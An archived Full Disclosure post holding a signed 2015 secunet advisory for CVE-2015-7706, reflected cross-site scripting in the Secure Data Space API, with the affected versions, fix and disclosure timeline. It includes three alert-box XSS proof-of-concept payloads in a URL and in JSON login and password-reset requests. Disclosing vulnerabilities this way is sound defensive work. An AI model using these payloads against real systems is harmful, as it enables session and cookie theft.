lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <23D849AFA607364BB9234C8EA130E73C0144D820@mail-essen-01.secunet.de>
Date: Wed, 9 Dec 2015 11:21:23 +0000
From: "Vogt, Thomas" <Thomas.Vogt@...unet.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] [CVE-2015-7706] SECURE DATA SPACE API Multiple Non-Persistent
 Cross-Site Scripting Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

secunet Security Networks AG Security Advisory

Advisory: SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting Vulnerabilities

1. DETAILS
- ----------
Product: SECURE DATA SPACE 
Vendor URL: www.ssp-europe.eu
Type: Cross-site Scripting[CWE-79]
Date found: 2015-09-30
Date published: 2015-12-09
CVSSv2 Score: 4,3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)  
CVE: CVE-2015-7706


2. AFFECTED VERSIONS
- --------------------
All product versions (Online, Dedicated, For Linux/Windows) in 
Web-Client v3.1.1-2  
restApiVersion: 3.5.7-FINAL
sdsServerVersion: 3.4.14-FINAL


3. INTRODUCTION
- ---------------
"The highly secure business solution for easy storage, synchronization, distribution and management of data - regardless of location or device"

(from the vendor's homepage)


4. VULNERABILITY DETAILS
- ------------------------
The Secure Data Share version v3.1.1-2 is vulnerable to multiple unauthenticated Non-Persistent Cross-Site Scripting vulnerabilities when user-supplied input is processed by the server.[0]  

#1 Proof-of-Concept:
https://example.com/api/v3//public/shares/downloads/111"}<BODY%20ONLOAD%3dalert('XSS')>

#2 Proof-of-Concept(authType parameter):
POST /api/v3/auth/login                                                            
{"login":"a","password":"a","language":1,"authType":"random<script>alert(1)<\/script>random"}

#3 Proof-of-Concept(login parameter):
POST /api/v3/auth/reset_password      
{"login":"random<script>alert(1)<\/script>random","language":1}


5. SECURITY RISK
- ----------------
The vulnerabilities can be used to temporarily embed arbitrary script code into the context of the Secure Data Space backend interface, which offers a wide range of possible attacks such as stealing cookies or attacking the browser and its components.


6. SOLUTION
- -----------
Update to Secure Data Space Versions:
Web-Client 3.1.3 - Rev. 3 or higher with
SDS-API 3.5.7 or higher


7. REPORT TIMELINE
- ------------------
2015-09-30: Vulnerability discovered
2015-10-02: Vendor notified
2015-10-02: Vendor acknowledges the vulnerability
2015-10-05: CVE requested from MITRE
2015-10-05: CVE-2015-7706 assigned
2015-10-13: Vendor releases update and security advisory[0]
2015-12-09: Advisory released


8. REFERENCES / CREDITS
- -----------------------
This vulnerability was discovered and researched by Thomas Vogt from secunet Security Networks AG.

[0] https://kb.ssp-europe.eu/pages/viewpage.action?pageId=12059988


secunet Security Networks AG
- ----------------------------
secunet is one of Germany's leading providers of superior IT security. In close dialogue with its customers – enterprises, public authorities and international organisations – secunet develops and implements high-performance products and state-of-the-art IT security solutions. Thus, secunet not only keeps IT infrastructures secure for its customers, but also achieves intelligent process optimisation and creates sustainable added value. More information about secunet can be found at:
https://www.secunet.com

- -- 
secunet Security Networks AG
Kronprinzenstraße 30
45128 Essen, Germany
Local Court of Essen HRB 13615
Board of management: Dr. Rainer Baumgart (CEO), Thomas Pleines
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
Comment: Using gpg4o v3.5.43.6457 - http://www.gpg4o.de/
Charset: utf-8

iQIcBAEBCAAGBQJWaA6xAAoJEEIZSc7HIQcnfooP/3Q5EwML/ogRifuJu10I6a3K
g95Seo4yNjm5Z/XlVBCguiyC2k9ZSkjYRIqtHfsgLHg0v3p/UQNa0zi7PEVZCBFp
bOZcL2U1QHPq1JgIgZS5Ps3mOPqXhcwC5Pl+Mr7SfiRgYy7QQ5SRovoWruJ0ioD3
sSLkQebr6fRW8vn8liAgqANwd81xJRcMDYm/asyMofRDHMNKn70ElZdCDRuCZU7M
7J71BfU7X4y0og4jFKI2cXRY8bg/9llxhh/fAnxs5erzs9naL0dAgLcMhplHaPy/
2sriZXq9p9V6ZT6yZnUUZKn6WQTO2Tl/1wkZIdAHxwCkrf8wBzQ/h+MYnolDd5De
RCUOp0aEkVD830E9ceTRGK32m0KSOS5dKgAZen4l9aXYvn/+8+Tnp6QRncNTyg7F
YiPCNhRhTLZCkdWLZSHqQpkf94JwTCAA0XolpfJm6omIPUv+f6KMo7YF/KwybpOR
hDXV82BFlQBADxXAgg7lrgj4bHsShJpuXUx/P6zxhbnm+th0L/TWamtSDhrIcbh8
nVfZeGvPsmWZ8dxJpu9Ffn7XIzmapXjTR3dfxMTcG3AazLfQdgmln3E4wuFQ6Q5g
c21W/suDru4QFt5jSPSXXOvrbgvGDEa30X4IHxMPYAfb5KwsUpZ49gmGAIZYXeer
nCczxuozpnigVBDdtccG
=YAbF
-----END PGP SIGNATURE-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ